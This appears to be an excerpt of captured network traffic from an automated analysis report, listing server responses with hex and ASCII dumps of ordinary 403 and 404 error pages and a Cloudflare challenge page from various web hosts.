6c 3e 0d 0a Data Ascii: 2a8<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC47", 1690487548, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1690487548 * 3.1415926535898; v = Math.floor(v); document.c
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:53:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=17X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: d24bacd2-57b0-4919-be4f-faba0afa36b7CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kvR7NBLJUeOxEJt9FgJe2qpMT2n0oQWcAbPx4lH3HNhiV3UpNyso4e6kurr9byAOPYwGxuMVsc36LhQKrznMikSxwnig3FO7oFWplPo4WFBPKZhSqBI%2BhJKN%2Fl67lrA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=151.000023Server: cloudflareCF-RAY: 7ed76d4c0d7abb38-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 27 Jul 2023 19:53:15 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlX-Wix-Request-Id: 1690487596.5624077668137794X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Accept-Ranges: bytesDate: Thu, 27 Jul 2023 19:53:16 GMTX-Served-By: cache-lin2290029-LINX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NQ1aV/eYQaI5OrqNssi0Z4K7wzLzv1xbqJ0M0SLNsFMg,qquldgcFrj2n046g4RNSVE8eNr0PeAeqFyO7fo2b794=Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Thu, 27 Jul 2023 19:53:31 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8MdJ%2FVnISR72KKqDlR8XQKndsVy7Y2BB6KN%2BCOSt%2B%2BzbCluOOTLrKAKR4qWCkcU7VFCYei%2Fd1RDLSy%2Fykfa0kIyztqjMi7DhFD5btVvZHEdjOCK9Nk3p0NSoR0YDOkcW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76d77c8401da8-FRAData Raw: 31 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 Data Ascii: 119f<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</tit
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:53:16 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:19 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMfWq5cd5HQrhfZROeg1bBla,qquldgcFrj2n046g4RNSVL5pznunIc8dqFlAvDKHESQ=X-Wix-Request-Id: 1690487599.31939497669217396X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 google
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 27 Jul 2023 19:53:19 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:23 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:23 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:23 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:53:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=19X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 400c7b09-f68d-4be9-a1dd-03a20a8087b3CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dPFYn0cOy7e1z%2BUX24r62pyZ%2FZdPqU5QPvdohDXevXnKCaRmEGbY7An3LhnzARAPMXfNVIYQoI1xgH2KL%2BFiVx%2BiusZRrfcuhUrdVp1PZxcEmgsbkOO187%2BbGsTT0mlkkw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=154.999971Server: cloudflareCF-RAY: 7ed76da1cad84dbd-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:23 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
